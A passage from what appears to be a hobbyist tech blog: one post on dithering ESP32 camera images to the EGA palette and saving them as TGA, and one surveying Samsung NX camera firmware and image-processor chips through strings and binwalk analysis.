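    return ((r5 << 3) | (r5 >> 2), (g6 << 2) | (g6 >> 4), (b5 << 3) | (b5 >> 2))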
However, after firing up the image sensor and taking a shot, we realize that everything is green. Not monochrome green, but bad-white-balance green. The suggested workaround is to give the camera some time to calibrate after enabling auto white balance, by taking and discarding a few shots:
sensor_t *s = esp_camera_sensor_get();
/* Enable AWB and AWB gain in auto mode */
s->set_whitebal(s, 1);
s->set_awb_gain(s, 1);
s->set_wb_mode(s, 0);
/* DO NOT DO COPY THIS! Set contrast and saturation to max for the EGA effect */
s->set_contrast(s, 2);
s->set_saturation(s, 2);
/* Take and discard a few pictures */
for (int i= 0 ; i < WARMUP_PICS; i++) {
camera_fb_t *fb = esp_camera_fb_get();
if (fb)
esp_camera_fb_return(fb);
}
After that (with WARMUP_PICS=10), the image is less green. Not quite true-color, but acceptable. The raw RGB565 image bytes (320*240*2 = 153600 of them) can be found in fb->buf:
As noted above, the image is 320*240 and not 320*200, as the EGA card didn't have square pixels. We can compensate for that by just skipping one of every six rows when converting. Then we can just fix the aspect ratio in post-production for modern PC displays, by scaling up to 200%x240%.
Interlude: viewing RGB565 images
An obvious intermediate step when developing a camera application is storing the "raw" or "intermediate" pixel arrays right to "disk", i.e. the µSD card.
RGB888 images can be trivially converted (and scaled up for modern displays) by ImageMagick, the author's favorite image processing CLI:
convert -depth 8 -size 320x240 input.rgb -scale 200% output.png
There is no direct driver for RGB565, but there is this RGB565 parser pattern and it leaves the author speechless. WTF. ImageMagick is the Swiss army knife of image processing, but is this Turing complete?!?
So maybe the second favorite image processing tool has something in the pipeline? Oh yes indeed:
ffmpeg -vcodec rawvideo -f rawvideo -pix_fmt rgb565be -s 320x240 -i input.rgb565 -f image2 -vcodec png output.png
Et voila! We can store intermediate pictures, test individual phases of the pipeline and see where things go wrong. The ESP32 µSD interface is quite slow, so storing the "huge" 150KiB and 225KiB images takes a second or so of intensive flash LED blinking. And that LED gets rather hot, so watch out for your fingers!
EGA 16-color palette
The EGA color palette was a natural choice for this experiment, because its 16 colors are well known and still in use today in terminal mode applications (including most things you can access through SSH). While they don't go back to Roman horse asses or 1920s punch cards, they were created by IBM in 1981 for the IBM CGA adapter, based on a simple one-bit-per-color plus one intensity bit scheme, and an analog hardware hack to replace the ugly yellow ocher with a slightly less unpleasant brown.
The result are the following natural colors beloved by retro pixel artists, perfectly suited for photography:
0 #000000 | 1 #0000AA | 2 #00AA00 | 3 #00AAAA | 4 #AA0000 | 5 #AA00AA | 6 #AA5500 | 7 #AAAAAA |
8 #555555 | 9 #5555FF | 10 #55FF55 | 11 #55FFFF | 12 #FF5555 | 13 #FF55FF | 14 #FFFF55 | 15 #FFFFFF |
Technically, the full EGA color palette has two bits per color, resulting in 64 total colors, but you can only ever choose 16 of them, and as the defaults are well-known, we are sticking to them.
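For reference, the default palette above follows exactly from that bit scheme, including the brown exception; a small Python sketch (the project itself hard-codes the resulting table in C):

def ega_color(i):
    # IRGB: bit 3 = intensity, bit 2 = red, bit 1 = green, bit 0 = blue
    intensity = 0x55 if i & 8 else 0x00
    r = (0xAA if i & 4 else 0x00) + intensity
    g = (0xAA if i & 2 else 0x00) + intensity
    b = (0xAA if i & 1 else 0x00) + intensity
    if i == 6:
        g = 0x55    # the analog hardware hack: yellow ocher becomes brown
    return (r, g, b)

EGA_PALETTE = [ega_color(i) for i in range(16)]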
To provide the best resulting image quality, for each pixel we will pick the closest EGA color by minimizing the Euclidean distance in three-dimensional RGB space. In other words, we'll sum the squared differences for each color channel and pick the palette entry with the smallest sum:
int best_match = INT_MAX, best_color = 0;
for (int i = 0; i < 16; i++) {
int delta_r = abs(EGA_PALETTE[i][0]-r);
int delta_g = abs(EGA_PALETTE[i][1]-g);
int delta_b = abs(EGA_PALETTE[i][2]-b);
int match = delta_r*delta_r + delta_g*delta_g + delta_b*delta_b;
if (match < best_match) {
best_match = match;
best_color = i;
}
}
We could implement a fancy look-up-table for each of the 65536 possible RGB565 values, but we have plenty of CPU cycles and not so much RAM, and only 64000 pixels, so we just do the look-up for each of them.
The results look surprisingly monochrome, with just a few colored areas. It turns out that the low saturation of the ESP camera sensor maps most real-world motives onto the four shades of grey when using the "closest color" approach. To increase the saturation, we'd have to convert our pixels into another colorspace, so let's look for a different approach.
Dithering of photos to 16 colors
The standard (old-school) technique to map natural colors to a limited palette is color dithering. There are different algorithms, with different trade-offs, resulting in different image quality.
The simplest one, average dithering, assigns the closest palette color to each pixel, and we've seen it in action above.
Floyd-Steinberg from 1975 is the most sophisticated one, giving the most natural results and a nice, irregular pixel distribution. It works by taking the error (the difference between the original color and the mapped palette color) of each pixel and spreading ("propagating") that error out to the neighbor pixels below and to the right. This creates a statistical distribution of colored pixels proportional to the level of the respective color in the image. The algorithm is clever in only propagating to pixels right of and below the current one, allowing it to process an image in a single linear pass.
However, it means that we need to change pixel values one row ahead in our buffer, and adding something to a pixel's color might overflow it, so we need to clip values to the (0, 31) or (0, 63) range. Instead, we can get a very good approximation by only propagating the error to the next pixel in the current row, with much less work:
There are slightly noticeable vertical line artifacts at the left edge, as we reset the error variables at the beginning of each row (otherwise, colors from the right edge would "bleed over"), that wouldn't be there with the two-dimensional approach of Floyd-Steinberg. Beyond that, this is already too good and almost too true-color to really count as a shitty image.
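A minimal sketch of this single-row error propagation, in Python for illustration (reusing EGA_PALETTE from the palette sketch above; the project does the same in C on the RGB565 buffer, and the clipping details are assumptions):

def closest_ega(r, g, b):
    # pick the palette index with the smallest squared RGB distance
    return min(range(16),
               key=lambda i: sum((p - c) ** 2 for p, c in zip(EGA_PALETTE[i], (r, g, b))))

def dither_row(row):                      # row = a list of (r, g, b) tuples
    out, err = [], (0, 0, 0)
    for (r, g, b) in row:
        # add the error left over from the previous pixel, clipped to 0..255
        r, g, b = (max(0, min(255, c + e)) for c, e in zip((r, g, b), err))
        idx = closest_ega(r, g, b)
        out.append(idx)
        # propagate the whole quantization error to the next pixel only
        err = (r - EGA_PALETTE[idx][0], g - EGA_PALETTE[idx][1], b - EGA_PALETTE[idx][2])
    return out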
There is one approach that was easier to implement on 1980s hardware (and that allowed better compression of the images), and that is ordered (or Bayer) dithering. It uses a (most often square) threshold table that is applied repeatedly across the image, changing the respective colors and resulting in a visible cross-hatch pattern.
By simply taking a bayer pattern table from StackOverflow, and doubling the threshold values to compensate for the pale camera colors, we get this:
Now why is this so monochrome again? Well, the Bayer pattern is applied individually to each of the three color channels, and we are using the same pattern position for the three channels of a pixel, so effectively we always apply a greyscale threshold. By simply shifting the pattern one pixel to the right for green and one pixel down for blue, we get a much better result:
Perfect! That's exactly the desired image quality to compete in the Shitty Camera Challenge!
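Sketched the same way, the channel-shifted ordered dither looks roughly like this (reusing closest_ega() from the previous sketch; the threshold scaling is an assumption, the project doubles a Bayer table from StackOverflow):

BAYER4 = [[ 0,  8,  2, 10],
          [12,  4, 14,  6],
          [ 3, 11,  1,  9],
          [15,  7, 13,  5]]

def ordered_dither_pixel(r, g, b, x, y):
    # use a different pattern offset per channel, otherwise the same threshold
    # hits all three channels at once and the result looks greyscale
    tr = BAYER4[y % 4][x % 4]
    tg = BAYER4[y % 4][(x + 1) % 4]       # shifted right for green
    tb = BAYER4[(y + 1) % 4][x % 4]       # shifted down for blue
    adj = lambda v, t: max(0, min(255, v + (t - 8) * 8))   # scaling assumed
    return closest_ega(adj(r, tr), adj(g, tg), adj(b, tb))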
Saving as TGA
Actually, TGA wasn't the first choice format for this project. The author's favorite is PCX (1985), which is only slightly younger than TGA, but was supported by the author's favorite image editing tool, that also featured the most creative versioning scheme: Deluxe Paint II Enhanced 2.0.
However, the author's favorite image viewer, Geeqie, fails to properly display PCX files, and fixing that was way out-of-scope for this project, or so the author thought. So we stick to TGA, which seems to be properly supported based on throwing a few test files at it.
The file format is simple when compression is disabled, coming with a small 18-byte header followed by the palette (in BGR order, not RGB), and then the packed raw pixel data, from bottom to top.
Well. In theory, TGA supports various color depths and palette types from 1 bit per pixel to RGBA. What we have is a 16-color 4bpp (4 bits per pixel; not to be confused with the "BPP" bytes-per-pixel used in the ESP32 headers) image with a 16*3 byte palette. However, the image processing tools that claim to "support" TGA don't actually accept arbitrary variants.
- Geeqie silently fails to display a 4bpp image
- ImageMagick mis-treats anything non-default as 8bpp with an opaque error message:
convert-im6.q16: unable to read image data 'shitty_133.xyz.tga' @ error/tga.c/ReadTGAImage/457.
So we have to artificially inflate our pixel data from 4bpp to 8bpp, and because the tools will also ignore the "number of colors in the palette" field and instead use the "number of colors in the image" field, we need to store a full 256-color palette in the file, of which we will only use the first 16 entries:
memcpy(tga, &header, sizeof(TgaHeader));
for (int i = 0; i < STORE_COLORS; i++) {
tga[sizeof(TgaHeader) + i*3 + 0] = EGA_PALETTE[i % COLORS][2];
tga[sizeof(TgaHeader) + i*3 + 1] = EGA_PALETTE[i % COLORS][1];
tga[sizeof(TgaHeader) + i*3 + 2] = EGA_PALETTE[i % COLORS][0];
}
for (y = 0; y < HEIGHT; y++) {
src_pos = y*WIDTH;
dst_pos = (HEIGHT - y - 1)*WIDTH;
memcpy(tga + sizeof(TgaHeader) + 3*256 + dst_pos, framebuffer + src_pos, WIDTH);
}
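For illustration, the 18 header bytes that the TgaHeader above has to contain for our uncompressed, color-mapped, 8bpp, bottom-up 320x240 image, sketched with Python's struct (the project fills an equivalent C struct):

import struct

# id length, color map type, image type 1 (uncompressed color-mapped),
# color map: first index, length, entry size in bits,
# image: x/y origin, width, height, bits per pixel, descriptor (0 = bottom-up)
TGA_HEADER = struct.pack('<BBBHHBHHHHBB',
                         0, 1, 1,
                         0, 256, 24,
                         0, 0, 320, 240, 8, 0)
assert len(TGA_HEADER) == 18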
The remaining code of the project is based on existing examples. Find the full ESP32-EGA16-TGA source code on GitHub. Beware, it's as shitty as everything shown above, to fit into the project. This is not production-quality C code.
Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.
Next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was triggered to find out which respective framework is powering which of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.
Hardware Overview
There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have a "NXnnnn" numbering scheme, with "nnnn" being a number between one and four digits.
In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.
In 2014, Samsung introduced the NX mini with a 1" sensor and the "NX-M" lens mount, sharing much of the architecture with the larger NX models.
In 2015, they announced (or rather, accidentally leaked) the NX mini 2, based on the DRIMeV SoC and running Linux, and even submitted it to the FCC, but it never materialized on the market after Samsung "shifted priorities". If you are the janitor in Samsung's R&D offices and know where all the NX mini 2 prototypes are locked up, or if you were involved in making them, I'd die to get my hands on one of them!
Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.
The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.
Origins of the DRIM engine
Apparently the first cameras introducing the DRIM engine ("Digital Real Image & Movie Engine") were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:
- NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
- NV40: also using the MB91686
- NV24: "TWE (MB91043)"
- NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"
There are also some WB* camera models built around Milbeaut SoCs:
- WB200, WB250F, WB30F, WB800F: MB91696 (the SoC has "MB91696B" on it, the service manual claims "MB91696AM / M6M2-J"), firmware strings confirm "M6M2J"
This looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is a MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.
Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.
Firmware Downloads
Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras however, firmware images are only available through shady "Samsung fan club" sites.
The first classification was provided by the firmware size, as there were distinct buckets: the first generation (NX5, NX10, and NX11) had unzipped sizes of ~15MB, while the last generation (NX1 and NX500) was beyond 350MB.
Googling for the respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identify the specific generation. Sometimes there were no press releases mentioning the SoC, and I had to resort to PCB photos found online or made by myself or other NX enthusiasts.
Further information was obtained by checking the firmware files with strings and binwalk, with the details documented below.
Note: most firmware files contain debug strings and file paths, often mentioning the account name of the respective developer. Personal names of Samsung developers are masked out in this blog post to protect the guilty... er, innocent.
Mirrorless Cameras
DRIMeII: NX10, NX5, NX11, NX100
The first NX camera released by Samsung was the NX10, so let's look into its firmware. The ZIP contains an nx10.bin, and running that through strings -n 20 still yields some 11K unique entries.
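That boils down to something like this (the exact counting pipeline is an assumption):
strings -n 20 nx10.bin | sort -u | wc -l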
There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:
* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt) *
* COPYRIGHT(c) 2008 SYRI *
It's barely possible to find out the details of those names after over a decade, and we still don't know which OS is powering the CPU.
One hint is provided by the source code reference in the binary:
D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h
This seems to be based on a "CSP", and feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:
Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1
The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.
The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.
None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".
DRIMeIII: NX200, NX20, NX210, NX1000, NX1100
One year later, in 2011, Samsung released the NX200 powered by DRIM (engine) III. It is followed in 2012 by NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, and the NX1x00 and NX2x0 stand for compact mobility.
The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.
Each of the firmware ZIPs contains two files named after the model, e.g. nx200.Rom and nx200.bin. Binwalking the Rom doesn't yield anything of value, except roughly a dozen artistic collage background pictures. strings confirms that it is some sort of filesystem not identified by binwalk (and it contains a classical music compilation, with tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute long, sounding like ringtones from the 2000s)! The pictures and music files can be extracted using PhotoRec.
The bin binwalk yields a few interesting strings though:
8738896 0x855850 Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580 0x9B38A4 Copyright string: "Copyright (C) 2011, Arcsoft Inc."
10275754 0x9CCBAA Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554 0x9FFF32 Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200 0xA024E0 VxWorks WIND kernel version "2.11"
So we have identified the OS as Wind River's VxWorks.
A strings
inspection of the bin
also gives us "ARM DRIMeIII - ARM926E
(ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird
network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy
ASCII art:
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]] ]]]] ]]]]]]]]]] ]] ]]]] (R)
] ]]]]]]]]] ]]]]]] ]]]]]]]] ]] ]]]]
]] ]]]]]]] ]]]]]]]] ]]]]]] ] ]] ]]]]
]]] ]]]]] ] ]]] ] ]]]] ]]] ]]]]]]]]] ]]]] ]] ]]]] ]] ]]]]]
]]]] ]]] ]] ] ]]] ]] ]]]]] ]]]]]] ]] ]]]]]]] ]]]] ]] ]]]]
]]]]] ] ]]]] ]]]]] ]]]]]]]] ]]]] ]] ]]]] ]]]]]]] ]]]]
]]]]]] ]]]]] ]]]]]] ] ]]]]] ]]]] ]] ]]]] ]]]]]]]] ]]]]
]]]]]]] ]]]]] ] ]]]]]] ] ]]] ]]]] ]] ]]]] ]]]] ]]]] ]]]]
]]]]]]]] ]]]]] ]]] ]]]]]]] ] ]]]]]]] ]]]] ]]]] ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]] KERNEL:
]]]]]]]]]]]]]]]]]]]]]]]]] Copyright Wind River Systems, Inc., 1984-2007
The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.
Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII based NX10!
Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.
DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30
In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.
I've looked into the NX300 root filesystem back in
2014, and the CPU generation was also
confirmed from /proc/cpuinfo
:
Hardware : Samsung-DRIMeIV-NX300
The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen), and the NX30 (released 2014, a larger variant with an EVF and built-in flash).
All of them have similarly sized and named firmware (nx300.bin
), and the
respective OSS downloads feature a TIZEN
folder. All are running Linux
kernel 3.5.0. There is a nice description of the firmware file
structure by
Douglas J. Hickok. The bin
files begin with SLP\x00
, probably for "Samsung
Linux Platform", and thus I documented them as SLP Firmware
Format
and created an SLP firmware
dumper.
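Checking a file for that magic takes only a few lines; here's a minimal sketch (the heavy lifting of actually parsing the partition table is left to the SLP firmware dumper mentioned above):

```python
import sys

# Minimal check for the SLP ("Samsung Linux Platform") firmware container:
# the file has to start with the four magic bytes 53 4c 50 00 ("SLP\x00").
def is_slp(path):
    with open(path, "rb") as f:
        return f.read(4) == b"SLP\x00"

if __name__ == "__main__":
    for path in sys.argv[1:]:                  # e.g. nx300.bin
        print(path, "->", "SLP firmware" if is_slp(path) else "something else")
```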
Fujitsu M7MU: NX mini, NX3000, NX3300
In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.
The firmware archive contains a file called DATANXmini.bin
(which is not the
SLP format and also a break with the old-school 8.3 filename
convention), and it seems to
use some sort of data compression, as most strings are garbled after 16
bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H
, here
using Vim's binary escape notation).
There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:
- ArcSoft
- FotoNation (face detection?)
- InterNiche Technologies (probably for their IPv4 network stack)
- DigitalOptics Corporation (optical systems)
- Jouni Malinen and contributors, with something that looks like a GPL header(!?!?):
Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.
This doesn't give us any hints on what is powering this nice curiosity of an ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.
It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.
The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!
GitHub code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in Python real quick now, and run that over the NX mini firmware:
Header | Value |
---|---|
block_size | 0x400 (1024) |
writer_load_size | 0x4fc00 (326656) |
write_code_entry | 0x40000400 (1073742848) |
sdram_param_size | 0x90 (144) |
nand_param_size | 0xe1 (225) |
sdram_data | *stripped 144 bytes* |
nand_data | *stripped 225 bytes* |
code_size | 0xafee12 (11529746) |
offset_code | 0x50000 (327680) |
version1 | "01.10" |
log | "201501162119" |
version2 | "GLUAOA2" |
model | "NXMINI" |
section_info | 00000007 00000001 0050e66c 00000002 001a5985 00000003 00000010 00000004 00061d14 00000005 003e89d6 00000006 00000010 00000007 00000010 00000000 9x 00000000 |
pdr | "" |
ddr | 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07 |
epcr | 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07 |
That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.
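For the record, a reader along those lines could look like the sketch below. The field order follows the table above, but the field widths, the string lengths and the little-endian assumption are mine for illustration, not copied from the kernel driver, so treat it as a starting point rather than a reference implementation:

```python
import struct
import sys

# Sketch of an M7MU firmware header reader. The field *order* follows the
# table above; the field widths, the string lengths and the little-endian
# byte order are assumptions -- the authoritative layout is the header
# struct in the forked Exynos kernel's m7mu driver.
def read_header(path):
    with open(path, "rb") as f:
        hdr = f.read(4096)                     # the header fits in the first blocks

    off = 0
    def u32():
        nonlocal off
        value = struct.unpack_from("<I", hdr, off)[0]
        off += 4
        return value

    fields = {}
    for name in ("block_size", "writer_load_size", "write_code_entry",
                 "sdram_param_size", "nand_param_size"):
        fields[name] = u32()
    # Skip the variable-length sdram/nand parameter blobs.
    off += fields["sdram_param_size"] + fields["nand_param_size"]
    fields["code_size"] = u32()
    fields["offset_code"] = u32()
    # ASCII fields, NUL-padded in the dump; the lengths are guesses.
    for name, length in (("version1", 8), ("log", 12),
                         ("version2", 8), ("model", 8)):
        fields[name] = hdr[off:off + length].rstrip(b"\x00").decode(errors="replace")
        off += length
    return fields

if __name__ == "__main__":
    for key, value in read_header(sys.argv[1]).items():   # e.g. DATANXmini.bin
        print(f"{key:18} {value!r}")
```

With the real struct layout filled in, the same approach should reproduce the table above.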
But why should the Linux kernel have a module to talk to an M7MU? One of the
kernel trees containing that code is called kernel_samsung_exynos5260
and the
Exynos 5260 is the SoC powering the Galaxy K
Zoom. So
the K Zoom does have a regular Exynos SoC running Android, and a second
Milbeaut SoC running the image processing. Let's postpone this Android
hybrid for now.
DRIMeV, Tizen Linux: NX1, NX500, Gear360
In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.256 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.
In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.
The NX1 is using the same modified version of the SLP firmware format as the
Gear360. In versions before 1.21, the ext4 partitions were uncompressed,
leading to significantly larger bin
file sizes. They still contain Linux
3.5.0 but ext4 is a significant change over the
UBIFS on the DRIMeIV cameras, and
allows in-place modification from a telnet shell.
Android phones with dedicated photo co-processor
Samsung has also experimented with hybrid devices that are neither quite smartphone nor quite camera. The first such device seems to be the Galaxy Camera from 2012.
The Android firmware ZIP files (obtained from a Samsung "fan club"
website) contain one or multiple tar.md5
files (which are tar archives with
appended MD5 checksums to be flashed by
Odin).
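A quick way to sanity-check such a file before unpacking it is to verify the appended checksum. The sketch below assumes (as seems to be the Odin convention, not something I have verified against Odin itself) that the md5sum line covers the 512-byte-aligned tar data in front of it:

```python
import hashlib
import sys

# Sketch: verify a Samsung Odin ".tar.md5". Assumption: the file is a plain
# tar archive (always a multiple of 512 bytes) with the output of `md5sum`
# appended as text, and the checksum covers only the tar part in front.
def check_tar_md5(path):
    data = open(path, "rb").read()
    tar_len = len(data) // 512 * 512           # tar data is 512-byte aligned
    tar_part, tail = data[:tar_len], data[tar_len:]
    if not tail.split():
        raise ValueError("no appended md5sum line found")
    expected = tail.split()[0].decode("ascii", "replace")
    actual = hashlib.md5(tar_part).hexdigest()
    return expected, actual

if __name__ == "__main__":
    expected, actual = check_tar_md5(sys.argv[1])
    print("OK" if expected == actual else f"MISMATCH: {expected} != {actual}")
```

Renaming the file to .tar and extracting it with plain tar usually works regardless, since tar ignores the trailing bytes after the end-of-archive blocks.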
Galaxy Camera (EK-GC100, EK-GC120)
For the Galaxy Camera EK-GC100, there is a
CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5
in the ZIP, that
contains multiple .img
files:
-rw-r--r-- se.infra/se.infra 887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra 768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra 159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra 4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra 5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img
None of these look like camera firmware, but system.img
is the Android
rootfs (a sparse image convertible with
simg2img to obtain an ext4
image). In the rootfs, /vendor/firmware/
contains a few files, including one
fimc_is_fw.bin
with 1.2MB.
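Before converting or loop-mounting, it helps to check whether an .img is an Android sparse image or already a raw ext4 filesystem; a small sketch using the well-known magic values:

```python
import struct
import sys

SPARSE_MAGIC = 0xED26FF3A   # Android sparse image magic (AOSP libsparse)
EXT_MAGIC = 0xEF53          # ext2/3/4 superblock magic

# Tell whether an .img is an Android sparse image (needs simg2img first)
# or already a raw ext filesystem (can be loop-mounted directly).
def classify(path):
    with open(path, "rb") as f:
        head = f.read(4)
        f.seek(0x438)                          # superblock at 1024 + magic at 0x38
        sb_magic = f.read(2)
    if len(head) == 4 and struct.unpack("<I", head)[0] == SPARSE_MAGIC:
        return "Android sparse image (convert with simg2img)"
    if len(sb_magic) == 2 and struct.unpack("<H", sb_magic)[0] == EXT_MAGIC:
        return "raw ext2/3/4 image (mount -o loop)"
    return "unknown format"

if __name__ == "__main__":
    for path in sys.argv[1:]:                  # e.g. system.img
        print(path, "->", classify(path))
```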
The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:
src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W *
* since 2010.05.21 for ISP Team *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"
Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processor is a built-in component of the Exynos4 SoC.
Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105
The next Android hybrid released by Samsung was the Galaxy S4
Zoom
(SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5
firmware, there is an additional 2MB camera.bin
file that contains the
camera processor firmware. Binwalk only reveals a few FotoNation copyright
strings, but strings
gives some more interesting
hints, like:
SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO
Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!
M9MO sounds like a 9th generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is an S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submitted to the FCC which are too low-res to identify if there is a dedicated SoC.
